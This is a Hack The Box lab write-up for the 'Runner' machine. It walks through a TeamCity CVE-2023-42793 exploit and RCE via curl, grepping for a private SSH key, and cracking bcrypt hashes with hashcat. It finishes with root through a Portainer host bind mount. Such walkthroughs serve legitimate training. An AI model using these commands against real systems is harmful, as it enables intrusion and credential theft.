Dark_Man
LinkedInHTB ProfileAbout
  • Posts
    • 👨‍🎓Getting Started With HTB Academy
    • 💻Getting Started With HTB Platform
    • ☠️Crushing the HTB CPTS Exam in Record Time: Insights & Pro Tips
  • Windows machines
    • Easy
      • HTB - Support
      • HTB - Remote
      • HTB - Heist
      • HTB - Sauna
      • HTB- Access
      • HTB - Active
      • HTB - Forest
      • HTB - Timelapse
      • HTB - Mailing
      • HTB - EscapeTwo
      • HTB - Cicada
    • Medium
      • HTB - Authority
      • HTB - Escape
      • HTB - Manager
      • HTB - StreamIO
      • HTB - Cascade
      • HTB - Monteverde
      • HTB - Resolute
      • HTB - Sniper
      • HTB - Queier
      • HTB - Pov
      • HTB - Certified
      • HTB - Administrator
    • Hard
      • HTB - Reel
      • HTB - BlackField
      • HTB - Mantis
      • HTB - Search
      • HTB - Office
      • HTB - Flight
      • HTB -Acute
      • HTB - Vintage
    • Insane
      • HTB - Absolute
      • HTB - Sizzle
      • HTB - Ghost
      • HTB - Rebound
      • HTB - Mist
  • Linux machines
    • Easy
      • HTB - Wifinetic
    • Medium
      • HTB - Runner
      • HTB - WifineticTwo
      • HTB - Heal
    • Hard
    • Insane
Powered by GitBook
On this page
  • Enumeration
  • Initial Access
  • Privilege Escalation
  1. Linux machines
  2. Medium

HTB - Runner

PreviousMediumNextHTB - WifineticTwo

Last updated 9 months ago

Enumeration


Scope

Ip Address 10.10.11.13

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ nmap -F $ip -Pn

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ nmap -p22,80,8000 -sCV $ip 

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open  http        nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Runner - CI/CD Specialists
8000/tcp open  nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
* Open ports: 22 -80 - 8000
* UDP Open ports: None
* Services: ssh - http - http-alt

CVE-2023-42793:

┌──(kali㉿kali)-[~/…/HTB/machines/Runner/CVE1]
└─$ python3 CVE-2023-42793.py -u http://teamcity.runner.htb 
   
[+] http://teamcity.runner.htb/login.html [H454NSec7607:@H454NSec]

Initial Access


To get RCE, I had to generate a token from the webapp to be able to use it in the exploit.

Token

eyJ0eXAiOiAiVENWMiJ9.QVBTbmdKY1RkUHRyU1dxN0d6ekgySnVsQi1n.NWU4MDVlOGEtYzViOC00NDdkLWE5ZDktZDNhYjQyNjQxMGI0

Get RCE

┌──(kali㉿kali)-[~/…/HTB/machines/Runner/CVE-2023-42793]
└─$ curl -X POST 'http://teamcity.runner.htb/app/rest/debug/processes?exePath=id' -H "Authorization: Bearer $(cat token.txt)" -H "Content-Type: text/plain"

StdOut:uid=1000(tcuser) gid=1000(tcuser) groups=1000(tcuser)

I tried to search for files containing passwords, sensitive info or private keys and found one.


tcuser@647a82f29ca0:/$ grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"
/data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys/id_rsa:1:-----BEGIN OPENSSH PRIVATE KEY-----

/data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys/id_rsa

-----BEGIN OPENSSH PRIVATE KEY-----
..snip..
xxxxxxxxxxxxxxxxxxxxxxxxBG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAlk2rRhm7T2dg2z3+Y6ioSOVszvNlA4wRS4ty8qrGMSCpnZyEISPl
htHGpTu0oGI11FTun7HzQj7Ore7YMC+SsMIlS78MGU2ogb0Tp2bOY5RN1/X9MiK/SE4liT
njhPU1FqBIexmXKlgS/jv57WUtc5CsgTUGYkpaX6cT2geiNqHLnB5QD+ZKJWBflF6P9rTt
zkEdcWYKtDp0Phcu1FUVeQJOpb13w/L0GGiya2RkZgrIwXR6l3YCX+mBRFfhRFHLmd/lgy
/R2GQpBWUDB9rUS+mtHpm4c3786g11IPZo+74I7BhOn1Iz2E5KO0tW2jefylY2MrYgOjjq
5fj0Fz3eoj4hxtZyuf0GR8Cq1AkowJyDP02XzIvVZKCMDgVNAMH5B7COTX8CjUzc0vuKV5
iLSi+vRx6vYQpQv4wlh1H4hUlgaVSimoAqizJPUqyAi9oUhHXGY71x5gCUXeULZJMcDYKB
..snip..
-----END OPENSSH PRIVATE KEY-----

I'll Try to login to ssh with the one of the existing users and the private key

Success :)

john@runner:~$ cat user.txt 
5b86f3875c0f223145xxxxxxxxxxxxxxxxxx

User flag: 5b86f3875c0f223145xxxxxxxxxxxxxxxxxx


Privilege Escalation

john@runner:~$ netstat -atnp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:5005          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9000          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8111          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9443          0.0.0.0:*               LISTEN      -
tcp        0      0 10.10.11.13:80          10.10.16.31:55852       ESTABLISHED -
tcp        0      0 127.0.0.1:8111          127.0.0.1:39674         TIME_WAIT   -       

I'll try to map internal ports with ssh local port forwarding

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ ssh -L 5005:localhost:5005 -L 9000:localhost:9000 -L 8111:localhost:8111 -L 9443:localhost:9443 john@$ip -i id_rsa

We got a web app

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ curl -I http://localhost:9000 
HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Content-Length: 19130
Content-Type: text/html; charset=utf-8
Last-Modified: Thu, 07 Dec 2023 08:15:07 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Date: Thu, 04 Jul 2024 06:29:29 GMT

http://localhost:9000

I knew I missed something so I returned to web app and found that I forgot to make a backup files and see what its content.

tcuser@647a82f29ca0:/data/teamcity_server/datadir/backup/database_dump$ cat users

ID, USERNAME, PASSWORD, NAME, EMAIL, LAST_LOGIN_TIMESTAMP, ALGORITHM
1, admin, $2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye, John, john@runner.htb, 1720069876567, BCRYPT
2, matthew, $2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/xxxxxxx/JQsdGLulmeVo.Em, Matthew, matthew@runner.htb, 1709150421438, BCRYPT
11, h454nsec7607, $2a$07$wpUET1qA8huRcRVWVeYXZ./XT43MJ0izESmdjKCZHawdKaSrp8oDq, , "", 1720071358142, BCRYPT
matthew:$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/xxxxxxx/JQsdGLulmeVo.Em
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ hashid -m '$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/xxxxxx/JQsdGLulmeVo.Em'
Analyzing '$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/xxxxxxx/JQsdGLulmeVo.Em'
[+] Blowfish(OpenBSD) [Hashcat Mode: 3200]
[+] Woltlab Burning Board 4.x 
[+] bcrypt [Hashcat Mode: 3200]

s
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Runner]
└─$ hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt

$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6Kxxxxx/JQsdGLulmeVo.Em:pixxxx23
Session..........: hashcat
Status...........: Cracked

Login in http://localhost:9000 with these credentials

This article is very useful to understand the setup of container but was based on older verions of portainer:

Following the post:

Get the image id

Try to map host file system to the container with the following settings

device: /
o: bind
type: none

Create a container with the settings below

Finally, Access the console and get root access :)

Root flag: e5072defc9d08b4320325b1e16a6b83f

GitHub - Zyad-Elsayed/CVE-2023-42793: JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE), CVE-2023-42793GitHub
Use Portainer for Privilege EscalationCyber Security Architect | Red/Blue Teaming | Exploit/Malware Analysis
Logo
Logo